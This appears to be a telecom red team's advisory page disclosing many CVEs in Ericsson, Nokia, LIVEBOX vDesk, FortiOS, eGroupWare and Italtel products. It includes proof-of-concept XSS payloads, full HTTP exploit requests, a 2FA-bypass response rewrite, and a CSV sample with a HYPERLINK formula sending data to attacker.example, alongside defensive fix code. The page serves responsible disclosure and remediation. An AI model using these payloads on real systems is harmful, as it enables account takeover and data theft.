As part of TIM's Cybersecurity activities, a working group dedicated to performing Security Assessments (Red Team) has been established; it analyses software developed on demand, commercial software and firmware.
Among the team's objectives is to detect the vulnerabilities that a potential attacker could exploit to carry out cyber attacks against TIM's infrastructure, and to highlight the real impacts observed.
The activity is not limited to checking known vulnerabilities, but includes specific research work aimed at discovering new vulnerabilities that are not yet publicly known (0-day vulnerabilities).
Whenever 0-day vulnerabilities are found, a "responsible disclosure" is made to the vendor of the analysed product, promptly and confidentially communicating the vulnerabilities discovered so that the vendor can reproduce them and produce a countermeasure (patch) within 90 days of the notification.
After the countermeasure (patch) is released, or once 90 days have passed since the report, the vulnerabilities are published and classified with MITRE (CVE, Common Vulnerabilities and Exposures).
Similar actions are taken within TIM's Security Testing and Incident Handling processes whenever they lead to the discovery of vulnerabilities not yet known to the vendor and the community.
Vulnerability Description: Improper Access Control – CWE-284
Software Version: 23.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-39909
CVSv3:
Severity:
Credits: Massimiliano Ferraresi, Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Brolli
Ericsson Network Manager (ENM), versions prior to 23.2, contains a vulnerability where Improper Access Control can allow unauthenticated users with low privilege to access the NCM application.
Vulnerability Description: Plaintext Storage of a Password ('Improper Password Storage') – CWE-256
Software Version: 17.1.20190111
NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-38328
CVSv3: 4.9
Severity: Medium
Credits: Luca Di Giuseppe, Antonio Papa, Stefano Scipioni, Fabio Minarelli, Massimiliano Brolli
An issue was discovered in eGroupWare 17.1.20190111. An Improper Password Storage vulnerability affects the setup panel under setup/manageheader.php, which allows authenticated remote attackers with administrator credentials to read a cleartext database password.
Step-by-step instructions and PoC
An authenticated admin user can read database credentials stored in cleartext in the eGroupWare setup panel.
Affected Endpoints
URL:
https://hostname/[REDACTED]/egroupware/setup/manageheader.php
https://hostname/[REDACTED]/egroupware/calendar/freebusy.php
Below are the evidences with the vulnerability details and the payload used.
Figure 7: Database credentials stored in cleartext in the eGroupWare setup panel
Security Impact
By exploiting this vulnerability, it is possible to access the web application's data stored in the database.
Vulnerability Description: Observable Response Discrepancy - CWE-204
Software Version: 10.12.4 6.0.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-26071
CVSv3: 7.5
Severity: High
Credits: Marco Ventura, Massimiliano Brolli
An issue was discovered in MCUBO ICT through v.10.12.4 – 6.0.2. An Observable Response Discrepancy can occur under the login web page. In particular, the web application provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor. This allows an unauthorized actor to perform User Enumeration attacks.
Vulnerability Description: Improper Access Control - CWE-284
Software Version: 21B
NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-26062
CVSv3: 7.0
Severity: High
Credits: Massimiliano Ferraresi, Luca Borzacchiello, Massimiliano Brolli
A mobile network solution internal fault is found in Nokia Web Element Manager 21B. Exploit of this vulnerability is not possible from outside of the mobile network solution architecture. This means that exploit is not possible from mobile network user UEs, from roaming networks, or from the Internet. Exploit is possible only from the CSP (Communication Service Provider) mobile network solution internal BTS management network.
Due to this vulnerability, the Nokia Web Element Manager allows an unprivileged user (must be logged in) to execute administrative functions.
Step-by-step instructions and PoC
First step: create two users:
· Nemuadmin (admin)
· testpt (read-only)
The following evidence shows the read-only functionalities for the testpt user:
Figure 1 read-only user
With an HTTP proxy it is possible to intercept the response to the login request made by testpt and change the fields in the response from "profile":"BTSRead" to "profile":"Nemuadmin" and from "readOnlyAccess": true to "readOnlyAccess": false.
Figure 2 request/response by testpt user (read only)
The user testpt will then have access to administrative functions.
As PoC, with testpt (read-only user) we dump the S1 traffic from the BBU:
Figure 4 Dump traffic with testpt (read-only)
Security Impact
By exploiting this vulnerability an attacker can access the admin's functionality with an unprivileged user.
Vulnerability Description: Improper Privilege Management - CWE-269
Software Version: 3.18
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-47531
CVSv3:
Severity:
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
EPG / vEPG (3.x versions prior to 3.25 and 2.x versions prior to 2.16) contains a vulnerability where Missing Input Validation can allow authenticated users to bypass the system CLI and execute commands they are authorized to execute directly in the UNIX shell. This vulnerability, if exploited, can lead to limited loss of confidentiality and/or low impact to integrity and availability of the system.
Vulnerability Description: Improper Neutralization of Formula Elements in a CSV File – CWE-1236
Software Version: < 22.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-46408
CVSv3: 6.8
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
Ericsson Network Manager (ENM), versions prior to 22.1, contains a vulnerability in the application Network Connectivity Manager (NCM) where improper Neutralization of Formula Elements in a CSV File can lead to remote code execution or data leakage via maliciously injected hyperlinks. The attacker would need admin/elevated access to exploit the vulnerability.
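As an added example (not ENM/NCM code), the neutralization step a CSV export needs against CWE-1236, together with a check that can be run over an existing export to find cells a spreadsheet would still evaluate; the header and row values are constructed.

```python
import csv
import io

# Leading characters that spreadsheets interpret as the start of a formula
# (including HYPERLINK() and DDE payloads): =, +, -, @, tab and carriage return.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell rather than display it.
    Leading spaces are ignored (spreadsheets skip them); plain numbers such as
    "-12.5" are left alone because they are numbers, not formulas."""
    s = value.lstrip(" ")
    if not s.startswith(FORMULA_TRIGGERS):
        return False
    try:
        float(s)
        return False
    except ValueError:
        return True


def neutralize_cell(value: str) -> str:
    """Prefix a formula-looking cell with a single quote so it is shown as text.
    The quote stays visible in the sheet; that is the accepted trade-off."""
    return "'" + value if is_formula_cell(value) else value


def export_csv(header, rows) -> str:
    """Write an export with every cell neutralized and fully quoted, so a crafted
    value cannot close the field early with its own quote or delimiter."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Defensive check over an existing export: (row, column) of every cell that
    would be evaluated when the file is opened in a spreadsheet."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                hits.append((r, c))
    return hits


# Constructed sample: a node comment carrying an injected hyperlink formula,
# next to legitimate values that start with '-' and '+'.
SAMPLE_HEADER = ["name", "state", "comment"]
SAMPLE_ROWS = [
    ["node-01", "ok", '=HYPERLINK("http://attacker.example/?"&A1,"open")'],
    ["node-02", "-12.5", "+39 06 1234567"],
]

if __name__ == "__main__":
    exported = export_csv(SAMPLE_HEADER, SAMPLE_ROWS)
    print(exported)
    print("cells still evaluated after neutralization:", find_formula_cells(exported))
```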
Vulnerability Description: Open Redirect – CWE-601
Software Version: < 22.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-46407
CVSv3: 4.8
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
Ericsson Network Manager (ENM), versions prior to 22.2, contains a vulnerability in the REST endpoint "editprofile" where Open Redirect HTTP Header Injection can lead to redirection of the submitted request to a domain outside the control of the ENM deployment. The attacker would need admin/elevated access to exploit the vulnerability.
Vulnerability Description: Improper Access Control (Export of Users) - CWE-284
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45180
CVSv3: 6.5
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. Broken Access Control exists under the /api/v1/vdesk_[DOMAIN]/export endpoint. A malicious user, authenticated to the product without any specific privilege, can use the API for exporting information about all users of the system (an operation intended to be available only to the system administrator).
Step-by-step instructions and PoC
A malicious user, authenticated to Collaboration vDesk without any specific privilege, can use the API for exporting the information about all the users of the system.
Affected Endpoints
· https://vdeskbridge.[HOSTNAME]/api/v1/vdesk_[DOMAIN]/export
Payload used by an attacker to export the information about all the users of the system:
Figure 4 Detail of the request and response. In the response we can see (highlighted in yellow) the information of the users encoded in base64.
Security Impact
This vulnerability would allow an attacker, authenticated as guest, to export the data of all the users registered in the system.
Vulnerability Description: Improper Access Control - CWE-284
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45178
CVSv3: 8.8
Severity: High
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. Broken Access Control exists under the /api/v1/vdeskintegration/saml/user/createorupdate endpoint, the /settings/guest-settings endpoint, the /settings/samlusers-settings endpoint, and the /settings/users-settings endpoint. A malicious user (already logged in as a SAML User) is able to achieve privilege escalation from a low-privilege user (FGM user) to an administrative user (GGU user), including the administrator, or create new users even without an admin role.
Step-by-step instructions and PoC
A malicious user already logged in as a SAML User is able to perform privilege escalation from FGM to GGU user, including the administrator, or create new users even with admin roles.
Affected Endpoints
· https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/saml/user/createorupdate
· https://vdesk.[REDACTED]/settings/guest-settings
· https://vdesk.[REDACTED]/settings/samlusers-settings
· https://vdesk.[REDACTED]/settings/users-settings
Below are the evidences with the vulnerability details and the payloads used:
Figure 5 Pair of HTTP requests and responses showing the role change from FGM to GGU
Security Impact
A user authenticated with SAML is able to change his privileges by granting his own profile high privileges, even admin privileges, in the system, causing privilege escalation.
Vulnerability Description: Insecure Direct Object Reference (Cached Files) – CWE-639
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45175
CVSv3: 6.5
Severity: Medium
Credits: Luca Borzacchiello, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. An Insecure Direct Object Reference can occur under the 5.6.5-3/doc/[ID-FILE]/c/[N]/[C]/websocket endpoint. A malicious unauthenticated user can access cached files in the OnlyOffice backend of other users by guessing the file ID of a target file.
Step-by-step instructions and PoC
A malicious user can fool vShare (through a WebSocket) into returning a link to the OnlyOffice cache of text files, even of other users.
The vulnerability can be exploited in the following way:
1. the attacker opens a text file in his vShare; this opens a websocket towards vdeskoffice;
2. the attacker looks at the history of websocket requests and finds the one that asks for the cached file;
3. the attacker replaces the ID of his own file with the target one. The target ID could be obtained (a) by performing a brute-force attack (32 bits of entropy), or (b) by looking at the browser history of the victim for a link of the following shape: [...]/5.6.5-3/doc/[ID]/... where [ID] is the target file ID.
Payload used to exploit the vulnerability:
Figure 1 Websocket payload with a spoofed "docid" (in yellow). The destination websocket is opened by the attacker and has the following shape: vdeskoffice.[HOST]/5.6.5-3/doc/[ID-FILE]/c/[N]/[C]/websocket. Notice that [ID-FILE] is the ID of the attacker's own file, and it is different from the one inserted in the body of the websocket message.
Figure 2 Websocket request and response. In the response (bottom right of the image) we can see the link to a file "Editor.bin". The file is the target document in DOCY format, which can be downloaded by the attacker. The file contains the content of the target document encoded in UTF-16LE. If the target file had been a ".txt" file, we would have seen here a link to the file directly.
Security Impact
Malicious users can access the cached files of other users if they guess the target OnlyOffice file ID.
Vulnerability Description: Improper Authentication (Bypass Two-Factor Authentication for SAML Users - Bad Backup Code Check) - CWE-287
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45174
CVSv3: 9.8
Severity: Critical
Credits: Antonella Marino, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication for SAML Users can occur under the /login/backup_code endpoint and the /api/v1/vdeskintegration/challenge endpoint. The correctness of the TOTP is not checked properly, and can be bypassed by passing any string as the backup code.
Step-by-step instructions and PoC
The application allows a user to set a "Backup Code" to be used during the two-factor authentication (instead of the TOTP).
Unfortunately, for SAML users the correctness of the backup code is not checked properly, and the check can be bypassed by passing any string as the backup code.
The vulnerability can be exploited directly from the web-ui by:
1. logging into the vDesk web application as SAML user;
2. selecting the “backup code” option;
3. inserting any string in the form.
Affected Endpoints
· https://vdeskbridge.[HOSTNAME]/login/backup_code
· https://vdeskbridge.[HOSTNAME]/api/v1/vdeskintegration/challenge
Below are the evidences with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
Figure 7 Detail of the request and response. Notice how even if the server response fails, the
Security Impact
By exploiting the lack of validation of the backup code for SAML users, the two-factor authentication can be bypassed by an attacker.
Vulnerability Description: Improper Authentication (Bypass Two-Factor Authentication - Lack of Server-Side Validation) - CWE-287
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45173
CVSv3: 9.8
Severity: Critical
Credits: Massimiliano Ferraresi, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication can occur under the /api/v1/vdeskintegration/challenge endpoint. Because only the client-side verifies whether a check was successful, an attacker can modify the response, and fool the application into concluding that the TOTP was correct.
Step-by-step instructions and PoC
The web application implements two-factor authentication through a TOTP code. To check whether the inserted TOTP is correct, the web application implements the API /api/v1/vdeskintegration/challenge. Unfortunately, only the client side verifies whether the check was successful, allowing an attacker to modify the response and fool the application into concluding that the TOTP was correct.
Affected Endpoints
· https://[...]/api/v1/vdeskintegration/challenge
Below are the evidences with the vulnerability details and the payloads used.
The application responds with the following JSON, notifying that the check was not successful:
{"status":"403","message":"OTP Check failed","totp":true}
The attacker, though, can modify the response, fooling the client-side code into believing that the check was successful:
{"status":200,"message":"OK","totp":true}
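The two vDesk second-factor findings above (CVE-2022-45174 and CVE-2022-45173) share one fix: the server must record the outcome of the challenge itself, and the backup code must be compared against a stored value. The following is an added illustration, not vDesk code; the session store, the TOTP seed, the backup code and the simplified endpoint behaviour are constructed assumptions. It shows the tampered-response case against a server that leaves the decision to the client, and the hardened server the same tampering fails against.

```python
import hashlib
import hmac
import json
import struct

# Constructed demo values (assumptions, not vDesk data).
TOTP_SECRET = b"constructed-demo-totp-seed"
BACKUP_CODE = "K7Q2-9XMD"
BACKUP_CODE_HASH = hashlib.sha256(BACKUP_CODE.encode()).hexdigest()
# The two JSON shapes quoted in the advisory.
FAIL = {"status": "403", "message": "OTP Check failed", "totp": True}
OK = {"status": 200, "message": "OK", "totp": True}


def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1) for the given Unix time."""
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)


class Session:
    """Server-side session after the first factor (password or SAML) succeeded."""
    def __init__(self, user: str, is_saml: bool = False):
        self.user = user
        self.is_saml = is_saml
        self.mfa_verified = False   # only the hardened server ever sets this
        self.backup_used = False


class VulnerableServer:
    """Models both findings: the verdict is only returned as JSON and never
    recorded server-side, and SAML users pass with any non-empty backup code."""
    def challenge(self, s: Session, code: str, now: int, backup: bool = False) -> str:
        if backup and s.is_saml and code:
            return json.dumps(OK)                  # any string accepted
        if code == totp(TOTP_SECRET, now):
            return json.dumps(OK)
        return json.dumps(FAIL)

    def files(self, s: Session) -> str:
        return "file list"                         # second factor never consulted


class HardenedServer:
    """The MFA decision is stored in the session; the backup code is compared
    in constant time against a stored hash and consumed on first use."""
    def challenge(self, s: Session, code: str, now: int, backup: bool = False) -> str:
        if backup:
            given = hashlib.sha256(code.encode()).hexdigest()
            ok = (not s.backup_used) and hmac.compare_digest(given, BACKUP_CODE_HASH)
            s.backup_used = s.backup_used or ok
        else:
            ok = hmac.compare_digest(code.encode(), totp(TOTP_SECRET, now).encode())
        if ok:
            s.mfa_verified = True
            return json.dumps(OK)
        return json.dumps(FAIL)

    def files(self, s: Session) -> str:
        return "file list" if s.mfa_verified else "denied"


def client_accepts(response: str) -> bool:
    """What the browser-side code concludes from the JSON it received."""
    return json.loads(response).get("status") == 200


def login_flow(server, code: str, now: int, tamper: bool = False,
               is_saml: bool = False, backup: bool = False) -> str:
    """One login attempt; returns what the protected resource answers.
    tamper=True rewrites the challenge response in transit into the success JSON."""
    s = Session("alice", is_saml)
    response = server.challenge(s, code, now, backup=backup)
    if tamper:
        response = json.dumps(OK)
    if not client_accepts(response):
        return "ui blocked"
    return server.files(s)


if __name__ == "__main__":
    now = 1700000000
    print("vulnerable, tampered response:", login_flow(VulnerableServer(), "wrong", now, tamper=True))
    print("hardened, tampered response:  ", login_flow(HardenedServer(), "wrong", now, tamper=True))
    print("hardened, valid TOTP:         ", login_flow(HardenedServer(), totp(TOTP_SECRET, now), now))
```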
Vulnerability Description: Multiple Improper Access Control - CWE-284
Software Version: < v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45172
CVSv3: 9.8
Severity: Critical
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk before v018. Multiple Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorization logic, through which a malicious user (with no privileges) is able to perform privilege escalation to the administrator role, and steal the accounts of any users on the system.
Step-by-step instructions and PoC
A malicious user without authentication is able to steal the accounts of other users, including the administrator, or create new users even with admin roles.
Affected Endpoints
· https://vdeskbridge.[REDACTED]/api/v1/registration/validateEmail?
· https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/user/adduser
· https://vdeskbridge.[REDACTED]/api/v1/registration/changePasswordUser
Payload used by an attacker to create arbitrary guest users without authentication:
Figure 1 HTTP request and response pair showing the creation of new users without authentication.
Figure 2 Pair of HTTP requests and responses showing the theft of a victim user's account without authentication.
Security Impact
A malicious user without authentication is able to steal the accounts of other users, including the administrator, or create new users even with admin roles.
Vulnerability Description: Cryptographic Issue (File Encryption API) - CWE-310
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45170
CVSv3: 6.5
Severity: Medium
Credits: Luca Borzacchiello, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Cryptographic Issue exists in the file encryption API under the /api/v1/vencrypt/decrypt/file endpoint: a malicious user can decipher a file without knowing the key set by the user.
Step-by-step instructions and PoC
The application allows a malicious user to decipher a file without knowing the key set by the user.
The vulnerability can be exploited in the following way:
1. the attacker logs in to the victim's account (we assume that the attacker knows the credentials of the victim, or has access to the victim's logged-in session);
2. the attacker lists the IDs of the files in the victim's vShare by performing a GET request to https://vdeskbridge.[HOSTNAME]/api/v1/files?path= ;
3. the attacker performs a POST request to https://vdeskbridge.[HOSTNAME]/api/v1/vencrypt/decrypt/file specifying the ID of the ciphered file that he wants to decipher (obtained at step 2).
Notice that the same attack succeeds if the attacker downloads the ciphered file, uploads it to his own vDesk account, and performs the same POST request as in step 3.
Affected Endpoints
· https://vdeskbridge.[HOSTNAME]/api/v1/vencrypt/decrypt/file
Below are the evidences with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
Figure 6 Notice how in the request we are not specifying any password or derived secret.
Security Impact
A malicious user can decrypt the victim's file without knowing the encryption key.
Vulnerability Description: Improper Neutralization of Directives in Dynamically Evaluated Code – CWE-95
Software Version: v9.7.05
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41763
CVSv3: 8.8
Severity: High
Credits: Claudio Jacomelli, Sebastiano Lanzarotto, Massimiliano Brolli
An issue was discovered in NOKIA AMS 9.7.05. Remote Code Execution exists via the debugger of the ipAddress variable. A remote user, authenticated to the AMS server, could inject code in the PING function. The privileges of the command executed depend on the user that runs the service.
Step-by-step instructions and PoC
A remote user, authenticated to the AMS server, could inject code in the PING function.
Affected Endpoints
· Server: AMS
· Function: PING Test
Below are the evidences with the vulnerability details and the payloads used.
The steps to trigger the vulnerability consist in a simple modification, via the debugger, of the ipAddress variable. This is needed because the frontend application sanitizes the content.
Security Impact
The vulnerability leads to code execution on the server machine to which the user is logged in. The privilege of the command executed depends on the user that runs the service.
Vulnerability Description: Absolute Path Traversal - CWE-36
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40715
CVSv3: 6.5
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
An issue was discovered in NOKIA 1350OMS R14.2. An Absolute Path Traversal vulnerability exists for a specific endpoint via the logfile parameter, allowing a remote authenticated attacker to read files on the filesystem arbitrarily.
Vulnerability Description: Multiple Reflected Cross Site Scripting - CWE-79
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40714
CVSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
An issue was discovered in NOKIA 1350OMS R14.2. Reflected XSS exists under different /oms1350/* endpoints.
Vulnerability Description: Multiple Relative Path Traversal - CWE-23
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40713
CVSv3: 6.5
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
An issue was discovered in NOKIA 1350OMS R14.2. Multiple Relative Path Traversal issues exist in different specific endpoints via the file parameter, allowing a remote authenticated attacker to read files on the filesystem arbitrarily.
Vulnerability Description: Multiple Reflected Cross Site Scripting - CWE-79
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40712
CVSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
An issue was discovered in NOKIA 1350OMS R14.2. Reflected XSS exists under different /cgi-bin/R14.2* endpoints.
Vulnerability Description: Stored Cross-Site Scripting - CWE-79
Software Version: FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40680
CVSv3: 5.4
Severity: Medium
Credits: Massimiliano Ferraresi, Massimiliano Brolli
An improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3 allows a privileged attacker to execute unauthorized code or commands via storing malicious payloads in replacement messages.
Step-by-step instructions and PoC
The vulnerability can be reproduced through the following actions.
An attacker with system permission can inject arbitrary JavaScript code in the Replacement Messages pages.
An attacker has to open and modify a page like "FortiGuard Block Page":
In the HTML source I tried to inject arbitrary JavaScript code, but with a simple payload <script>alert(1);</script> the application did not execute anything:
Probably the application sanitizes the <script></script> content and does not execute the JavaScript code inside these tags; however, with a custom payload like <image/src/onerror=prompt("XSS")> it is possible to execute arbitrary JavaScript code:
· <image/src/onerror=prompt("XSS")>
Click on "ok" and save the setting; the malicious code is now stored in the FortiGuard Block Page, and if a user visits this page the arbitrary JavaScript code will execute:
Security Impact
A potential attacker could modify the vulnerable web page with malicious javascript code permanently, thereby attacking anyone who visits the page.
Vulnerability Description: Insertion of Sensitive Information into Log File - CWE-532
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39821
CVSv3: 7.5
Severity: High
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, an Insertion of Sensitive Information into an Application Log File vulnerability occurs. The web application stores critical information, such as cleartext user credentials, in world-readable files in the filesystem.
Vulnerability Description: OS Command Injection - CWE-78
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39819
CVSv3: 8.8
Severity: High
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, multiple OS Command Injection vulnerabilities occur. This allows authenticated users to execute commands on the operating system.
Vulnerability Description: SQL Injection - CWE-89
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39817
CVSv3: 8.8
Severity: High
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, multiple SQL Injection vulnerabilities occur. Exploitation requires an authenticated attacker. Through the injection of arbitrary SQL statements, a potential authenticated attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.
Vulnerability Description: Insufficiently Protected Credentials - CWE-522
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39816
CVSv3: 6.5
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, Insufficiently Protected Credentials (cleartext administrator password) occur in the edit configuration page. Exploitation requires an authenticated attacker.
Vulnerability Description: OS Command Injection - CWE-78
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39815
CVSv3: 9.8
Severity: Critical
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, multiple OS Command Injection vulnerabilities occur. These vulnerabilities allow unauthenticated users to execute commands on the operating system.
Vulnerability Description: Open Redirect - CWE-601
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39814
CVSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, an Open Redirect vulnerability occurs in the login page via the next HTTP GET parameter.
Vulnerability Description: Multiple Cross Site Scripting Reflected/Stored - CWE-79
Software Version: 5.2.0-20211008
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39813
CVSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
Italtel NetMatch-S CI 5.2.0-20211008 allows Multiple Reflected/Stored XSS issues under NMSCIWebGui/j_security_check via the j_username parameter, or NMSCIWebGui/actloglineview.jsp via the name or actLine parameter. An attacker leveraging this vulnerability could inject arbitrary JavaScript. The payload would then be triggered every time an authenticated user browses the page containing it.
Step-by-step instructions and PoC
The web application does not properly check the parameters sent as input from clients before they are re-included in the HTTP pages returned by the application. In particular, the web GUI is affected by both the stored and the reflected type of this vulnerability. Due to the lack of validation of user input, an attacker can modify the HTML code and alter the expected execution flow. The attack can be performed both pre- and post-authentication.
Affected Endpoints
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_check
  o HTTP POST Parameter: j_username
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
  o HTTP POST Parameter: name, actLine
Below are the evidences with the vulnerability details and the payloads used.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_check
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/j_security_check HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=test.csv;%3Cimg+src
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
j_username=<img+src=x+onerror=alert(document.cookie)+>&j_password=%27
The endpoint is affected by the Stored type of this vulnerability. The first step consists of replacing the value of the "j_username" POST parameter with the JavaScript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since this kind of alert generates a notification on the home page, the JavaScript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical, since the attacker does not need any kind of access to the web application in order to exploit it.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 608
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=today.csv
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
name=today.csv&actLine="</script><img src=x onerror="alert(1)">
The endpoint is affected by the Reflected type of this vulnerability. The first step consists of replacing the value of the "actLine" POST parameter with JavaScript code to modify the content of the HTML response page; the content of the parameter is printed without any checks being made. The same behaviour is present for the name parameter. This endpoint is exploitable by any authenticated user that is able to view the application logs.
Security Impact
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.
Vulnerability Description: Absolute Path Traversal - CWE-36
Software Version: 5.2.0-20211008
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39812
CVSv3: 7.5
Severity: High
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
Italtel NetMatch-S CI 5.2.0-20211008 allows Absolute Path Traversal under NMSCI-WebGui/SaveFileUploader. An unauthenticated user can upload files to an arbitrary path. An attacker can change the uploadDir parameter in a POST request (not possible using the GUI) to an arbitrary directory. Because the application does not check in which directory a file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.
Step-by-step instructions and PoC
An unauthenticated user can upload files in an arbitrary path using a specific functionality of the web application. An attacker can change the “uploadDir” parameter in the POST request (not possible using the GUI) to an arbitrary directory. Since the application does not check in which directory the file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.
Below are the evidences with the vulnerability details and the payloads used. In this case, uploadDir was changed from /var/tmp/external/ to /home/oam/.
Payload used to exploit the vulnerability:
